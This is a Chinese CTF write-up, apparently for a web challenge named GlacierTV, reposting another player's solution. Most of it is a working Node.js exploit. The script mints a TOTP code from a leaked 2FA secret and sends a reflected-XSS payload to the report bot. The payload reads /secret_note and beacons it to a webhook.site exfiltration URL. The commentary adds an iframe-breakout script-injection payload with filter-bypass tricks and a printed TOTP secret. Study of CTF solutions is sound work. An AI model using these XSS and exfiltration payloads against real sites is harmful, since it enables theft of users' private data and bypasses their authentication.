先放个别人的wp
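// Exploit driver for the writeup: register a 2FA secret, mint a TOTP code from
// it, then ask the report bot to open a page whose `uri` parameter reflects an
// onload handler. That handler reads /secret_note with the code and beacons it
// to an exfiltration endpoint. Target and exfil endpoint are overridable via
// environment variables; the defaults are the values from the original run.
const axios = require("axios");
const OTPAuth = require("otpauth");

const TARGET = process.env.TARGET ?? "http://127.0.0.1:8080";
// Endpoint the victim browser beacons the stolen note to.
const EXFIL_URL =
  process.env.EXFIL_URL ??
  "https://webhook.site/6f4685d1-e490-4a8c-bff7-bdea8ff722ac";

(async () => {
  try {
    // /setup_2fa answers with an otpauth:// URI (response.data.totp); the
    // secret inside it is enough to generate a currently valid code.
    const response = await axios.post(`${TARGET}/setup_2fa`);
    const token = OTPAuth.URI.parse(response.data.totp).generate();

    // Runs inside the bot's browser. The note is base64'd and then URL-encoded:
    // raw base64 contains '+', '/' and '=', which a query-string parser would
    // otherwise mangle (e.g. '+' -> space). NOTE: btoa() throws on characters
    // outside Latin-1; if the note may contain such text, UTF-8 encode it first.
    const xss_payload = `fetch('/secret_note?token=${token}').then(resp => resp.text()).then(text => { new Image().src = "${EXFIL_URL}?data=" + encodeURIComponent(btoa(text)); })`;

    // The payload lands in an onload attribute via the reflected `uri` query
    // parameter, so its base64 form is URL-encoded for the same reason as above.
    // The TOTP code is only valid for its period (see the otpauth URI), so the
    // report is sent immediately after generating it; a bot that visits after
    // the window rolls over gets nothing useful from /secret_note.
    const data = {
      path: `?uri=https://www.youtube.com/%22%20onload=%22eval(atob(%27${encodeURIComponent(btoa(xss_payload))}%27))`,
    };
    await axios.post(`${TARGET}/report`, data);
  } catch (error) {
    console.log(error);
  }
})();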
|
但是其实就做了两件事,第一个就是把链接粘贴到上面的栏
https://www.youtube.com?injection="></iframe><h1>1</h1><script\src="http:\/\/url"></script>
先用 `">` 闭合 src 属性和标签,再用 `</iframe>` 提前关闭 iframe,后面的 `<h1>` 和 `<script>` 就会被当成页面内容解析;`<script\src=` 和 `http:\/\/` 里的反斜杠是为了绕过对空格和 `//` 的过滤(这一点从 payload 推断,可自行验证)
第二个是获得token
otpauth://totp/GlacierTV:2FA?issuer=GlacierTV&secret=3W3TOVY7ENE6YNXCS2Y7SSPPQ5WHCXM4NQ5BUOZATC2GQEMHWRKQ&algorithm=SHA3-384&digits=9&period=43
用这一串可以去生成那个令牌(注意 URI 里 algorithm=SHA3-384、digits=9、period=43:生成库必须支持 SHA3-384 和 9 位码,且令牌每 43 秒轮换,要在 bot 访问之前刚生成才有效),然后那个链接里是自己的 js 代码,完成 xss 注入